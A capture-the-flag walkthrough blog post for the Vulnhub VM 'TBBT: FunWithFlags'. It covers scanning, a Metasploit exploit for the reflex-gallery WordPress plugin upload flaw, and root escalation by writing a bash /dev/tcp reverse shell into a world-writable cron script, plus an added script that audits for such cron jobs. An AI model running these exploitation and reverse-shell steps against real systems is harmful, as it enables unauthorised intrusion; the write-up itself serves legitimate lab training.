TBBT: FunWithFlags Walkthrough vulnhub


Today we’re sharing another Vulnhub CTF walkthrough: TBBT: FunWithFlags, designed by emaragkos. The VM is hosted on Vulnhub.com and can be downloaded from the machine link.

Network Scanning

Our first step is to find the target’s IP address on the local network with netdiscover (an ARP-based host discovery tool):

netdiscover

After finding the target IP address (192.168.1.105), I run an Nmap aggressive scan (-A: OS and version detection, default scripts and traceroute) against all 65535 TCP ports (-p-):

nmap -A 192.168.1.105 -p-

dirb is a web content scanner; I used it to brute-force for accessible files and directories on the web server:

dirb http://192.168.1.105

Enumeration

The dirb results list many URLs. Opening http://192.168.1.105/music/wordpress/ in the browser shows a WordPress site, so I ran dirb against that path as well:

dirb http://192.168.1.105/music/wordpress/

Without wasting time I moved on to WPScan, the WordPress vulnerability scanner (-e ap enumerates all installed plugins):

wpscan --url http://192.168.1.105/music/wordpress/ -e ap

WPScan reported an outdated plugin, reflex-gallery version 3.1.3. Searching Exploit-DB for it turned up an arbitrary file upload exploit, which is also available as a Metasploit module. Note that rhosts must be the target address found above (192.168.1.105):

msfconsole
use exploit/unix/webapp/wp_reflexgallery_file_upload
set targeturi /music/wordpress/
set rhosts 192.168.1.105
run
shell

The shell command drops us into a restricted, non-interactive shell (no prompt, no TTY), so I upgrade it to an interactive TTY with Python 3 and look at the home directories:

python3 -c 'import pty;pty.spawn("/bin/bash")'
cd /home
ls

In Amy’s home directory I found two files, notes.txt and secretdiary:

cd amy
ls -lsa

Reading notes.txt with cat shows a hint message: this is my secret diary.

cat notes.txt

Following the hint, I ran strings on secretdiary and found an 18-digit password:

strings secretdiary

Enumeration time! Moving on through the home directories, I found the second flag in Penny’s home directory:

cd penny
cat .FLAG.penny.txt

Privilege Escalation

cd leonard
ls -lsa

Leonard’s directory contains a bash script with some comments in it. Its permissions show that the file is owned by root but writable by every user:

cat thermostat_set_temp.sh

/etc/crontab shows that thermostat_set_temp.sh is run automatically every minute by root. Since anyone can write to the file, I overwrite it with a simple bash reverse shell pointing at my attacking machine (192.168.1.4) using echo:

cat /etc/crontab
echo "bash -i >& /dev/tcp/192.168.1.4/4545 0>&1" > thermostat_set_temp.sh

One caveat: the >& and /dev/tcp redirections are bash features. If the cron entry executes the script directly rather than through bash, keep the original #!/bin/bash shebang as the first line so the payload is not interpreted by /bin/sh.

Before the cron job fires again, start a netcat listener on the attacking machine. Running the script by hand only returns a shell as the current web-server user; the root shell comes from the cron job, so the listener has to be up before that minute passes.

nc -lvp 4545
./thermostat_set_temp.sh

After waiting about a minute I got a reverse shell as the root user. I moved into the root directory and read the final flag:

id
cd /root
ls
cat FLAG-leonard.txt
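The misconfiguration abused above (a root cron job executing a script that any user can modify) is worth checking for systematically during enumeration rather than by eyeballing one ls -lsa. The following audit script is an added example, not part of the original walkthrough or of the VM: it parses system-crontab entries, pulls out the absolute paths of the scripts and binaries they run, and reports every one whose group or other write bit is set, along with its owner so a root-owned but world-writable file stands out. The temp directory, the file names and the sample schedule shown in the comments are assumptions for the example; on a real target point it at /etc/crontab and the files under /etc/cron.d.

```shell
#!/usr/bin/env bash
# Added example (not from the original walkthrough): hunt for cron jobs whose
# scripts are writable by users other than the owner, the misconfiguration that
# gave root on this box. Uses only ls/awk/cut so it also runs on a minimal target.

# Print the absolute paths referenced by each job in a system-format crontab
# (five schedule fields, a user field, then the command). Comments, blank lines
# and VAR=value lines are skipped; @reboot/@hourly entries use one schedule field.
cron_script_paths() {
    awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ || /^[[:space:]]*[A-Za-z_]+=/ { next }
        {
            start = ($1 ~ /^@/) ? 3 : 7
            for (i = start; i <= NF; i++) if ($i ~ /^\//) print $i
        }' "$1"
}

# Succeed (and print "path owner=U mode=-rwxrwxrwx") when the file exists and
# its group or other write bit is set. Positions 6 and 9 of the ls mode string
# are the group and other write bits, which is portable across ls versions.
writable_by_others() {
    f=$1
    [ -f "$f" ] || return 1
    line=$(ls -ld "$f")
    perms=$(printf '%s' "$line" | cut -c1-10)
    owner=$(printf '%s' "$line" | awk '{print $3}')
    g=$(printf '%s' "$perms" | cut -c6)
    o=$(printf '%s' "$perms" | cut -c9)
    if [ "$g" = w ] || [ "$o" = w ]; then
        printf '%s owner=%s mode=%s\n' "$f" "$owner" "$perms"
        return 0
    fi
    return 1
}

# Audit one crontab file: print every loosely permissioned script it runs.
# Returns 0 when at least one finding was printed, 1 when nothing was found.
audit_crontab() {
    hits=0
    for p in $(cron_script_paths "$1"); do
        writable_by_others "$p" && hits=$((hits + 1))
    done
    [ "$hits" -gt 0 ]
}

# Usage on a real host (hypothetical paths; same step as cat /etc/crontab above):
#   audit_crontab /etc/crontab
#   for f in /etc/cron.d/*; do audit_crontab "$f"; done
```

Two things the script deliberately does not cover, which you should still check by hand: a script that is itself read-only but sits in a directory you can write to (you can delete and recreate it), and cron commands given as a bare name that is resolved through cron's PATH, where a writable directory early in that PATH is just as good as a writable script.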

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.
